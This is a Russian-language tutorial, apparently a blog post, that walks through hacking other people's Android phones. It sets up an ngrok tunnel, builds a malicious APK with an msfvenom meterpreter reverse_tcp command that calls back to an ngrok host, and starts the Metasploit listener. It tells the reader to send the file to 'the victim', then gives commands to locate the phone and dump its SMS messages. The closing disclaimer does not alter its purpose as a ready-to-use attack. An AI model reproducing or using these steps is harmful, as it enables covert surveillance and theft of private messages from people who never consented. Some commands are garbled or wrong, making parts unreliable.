Привет, хакеры, в данной статье поговорим о ngrok и metasploit и способы взлома телефона и получения удаленного доступа к смартфону, используя эти программы.
Первым делом переходим на официальный сайт ngrok и создаем аккаунт. Скачивает и устанавливаем инструмент. Ссылка - https://ngrok.com/download
Перемещаем иконку запуска на рабочий стол для удобства, запускаем и прописываем следующую строчку: ngrok-stable-linux-amd64.zip
После прописываем: ./ngrok authtoken <TOKEN>
В терминале пишем: ./ngrok tcp 4444
Не забывайте, если вы имеете белый адрес, то данные пункты можно пропустить и даже не использовать Ngrok.
Следующим этапом является полноценное создание Payload’а для смартфона. Чтобы создать его будем использовать msfvenom, поэтому используя новую консоль прописываем в ней:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk
Если ngrok вы не использовали, то поле LHOST прописываешь собственный ип-адрес, а в LPORT прописываем 4444.
Отлично, payload подготовлен, теперь необходимо передать его нашей жертве.
Далее необходимо узнать ip-адрес, используя Kali Linux пишем – “ipconfig”, если у вас установлен Arch, то прописываем “ip a”.
Теперь атаку будет производить metasploit, если используете кали, то установке не требуется, он предустановлен.
Для запуска прописываем в консоле: msfconsole.
И пишем:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
Когда жертва откроет payload мы сразу же увидим открытую сессию.
С этого момента получаем удаленный доступ к телефону жертвы.
Для нахождения местоположения необходимо написать: geolocate
Также можно скопировать все смс-сообщения при помощи команды: sms_dump
Используя подобную незамысловатую схему, вы можете легко получать доступ к чужим смартфонами и работать с инструментами, чтобы использовать полученную информацию.
Я никого ни к чему не призываю, статья написана в ознакомительных целях!